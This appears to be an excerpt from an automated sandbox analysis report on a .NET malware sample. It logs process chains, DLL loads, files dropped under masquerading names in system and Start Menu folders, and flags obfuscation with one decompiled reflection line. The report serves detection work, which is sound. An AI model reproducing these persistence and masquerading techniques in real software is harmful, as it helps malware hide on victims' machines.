                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\uHdcbfRrII.bat"
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ybJBPcXt9a.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                            Source: C:\Users\user\Desktop\teh76E2k50.exe Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, sspicli.dll, ktmw32.dll, ntmarta.dll, uxtheme.dll, propsys.dll, dlnashext.dll, wpdshext.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
                            Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll, apphelp.dll
                            Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll, fsutilext.dll
                            Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll, mswsock.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, winnsi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, sspicli.dll, ktmw32.dll, wbemcomn.dll, amsi.dll, userenv.dll, iphlpapi.dll, dnsapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, winnsi.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, uxtheme.dll, propsys.dll, dlnashext.dll, wpdshext.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: dlnashext.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: wpdshext.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: ktmw32.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: rasapi32.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: rasman.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: rtutils.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: winhttp.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: propsys.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: dlnashext.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: wpdshext.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: edputil.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: urlmon.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: iertutil.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: srvcli.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: netutils.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: windows.staterepositoryps.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: appresolver.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: bcp47langs.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: slc.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: sppc.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, Section loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, Section loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, Section loaded: profapi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, Section loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, Section loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, Section loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, Section loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, Section loaded: ktmw32.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, Section loaded: wbemcomn.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, Section loaded: amsi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, Section loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, Section loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, Section loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, Section loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, Section loaded: dhcpcsvc.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, Section loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, Section loaded: rasapi32.dll
                            Source: C:\Windows\System32\w32tm.exe, Section loaded: iphlpapi.dll
                            Source: C:\Windows\System32\w32tm.exe, Section loaded: logoncli.dll
                            Source: C:\Windows\System32\w32tm.exe, Section loaded: netutils.dll
                            Source: C:\Windows\System32\w32tm.exe, Section loaded: ntmarta.dll
                            Source: C:\Windows\System32\w32tm.exe, Section loaded: ntdsapi.dll
                            Source: C:\Windows\System32\w32tm.exe, Section loaded: mswsock.dll
                            Source: C:\Windows\System32\w32tm.exe, Section loaded: dnsapi.dll
                            Source: C:\Windows\System32\w32tm.exe, Section loaded: rasadhlp.dll
                            Source: C:\Windows\System32\w32tm.exe, Section loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\w32tm.exe, Section loaded: kernel.appcore.dll
                            Source: C:\Users\user\Desktop\teh76E2k50.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{289AF617-1CC3-42A6-926C-E6A863F0E3BA}\InProcServer32
                            Source: Window Recorder, Window detected: More than 3 window changes detected
                            Source: C:\Users\user\Desktop\teh76E2k50.exe, Directory created: C:\Program Files\Windows Mail\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                            Source: C:\Users\user\Desktop\teh76E2k50.exe, Directory created: C:\Program Files\Windows Mail\81acb8af1bb493
                            Source: teh76E2k50.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: teh76E2k50.exe, Static PE information: Virtual size of .text is bigger than: 0x100000
                            Source: teh76E2k50.exe, Static file information: File size 3923968 > 1048576
                            Source: teh76E2k50.exe, Static PE information: Raw size of .text is bigger than: 0x100000 < 0x3bd800
                            Source: teh76E2k50.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000020.00000002.2976138886.000000001B540000.00000004.00000020.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000038.00000002.3585076992.000000001B3B6000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: KZll\System.pdbYA source: wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 0000002C.00000002.3345697219.000000001C023000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: em.pdb source: wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000026.00000002.3058692219.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb source: wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000020.00000002.2976138886.000000001B540000.00000004.00000020.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000038.00000002.3585076992.000000001B3B6000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: em.pdbpdbtem.pdb source: wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000032.00000002.3503891840.000000001C100000.00000004.00000020.00020000.00000000.sdmp

                            Data Obfuscation

                            Source: teh76E2k50.exe, mD10jnSFKu6YL9mCDNG.cs .Net Code: Type.GetTypeFromHandle(VCjgu9UyprjgRVDyZ23.gZd2dHJFeEP(16777425)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(VCjgu9UyprjgRVDyZ23.gZd2dHJFeEP(16777246)),Type.GetTypeFromHandle(VCjgu9UyprjgRVDyZ23.gZd2dHJFeEP(16777260))})
                            Source: C:\Users\user\Desktop\teh76E2k50.exe Code function: 0_2_00007FF849157564 push ebx; iretd 0_2_00007FF84915756A
                            Source: teh76E2k50.exe, QUB5UPMVljRJ07Cr7qD.cs High entropy of concatenated method names: '_71a', 'd65', 'YqtHDmfLNTj', 'JieHD6yImBv', 'pPJHTrSS6Kp', 'W8rHDOnOO0B', 'opDl3JHISa7YSRXD3lfL', 'BZnQTFHIE9lhERF3RU2M', 'utKK1bHIUFa1krkLGgeK', 'LWPxM2HIJLIPKUokb2ih'
Source: C:\Users\user\Desktop\teh76E2k50.exe; File created: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
Source: C:\Users\user\Desktop\teh76E2k50.exe; File created: C:\Program Files\Windows Mail\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
Source: C:\Users\user\Desktop\teh76E2k50.exe; File created: C:\Windows\SchCache\sihost.exe
Source: C:\Users\user\Desktop\teh76E2k50.exe; File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
Source: C:\Users\user\Desktop\teh76E2k50.exe; File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                            Source: C:\Users\user\Desktop\teh76E2k50.exe File created: C:\Windows\SchCache\sihost.exe
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\qnXVOghu.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\OsbzKhHx.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\GOTKaosQ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\FJIjaFCP.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\wfzurMmi.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\nxgeHjhA.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\eTYoXqRT.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\UkEZnNMm.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\CYcTTrrX.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\spJDjPmp.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\jGqnAmhH.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\adhyQtRa.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\ZYWXQKba.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\IQFswXwL.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeFile created: C:\Users\user\Desktop\yimcMvrd.logJump to dropped file
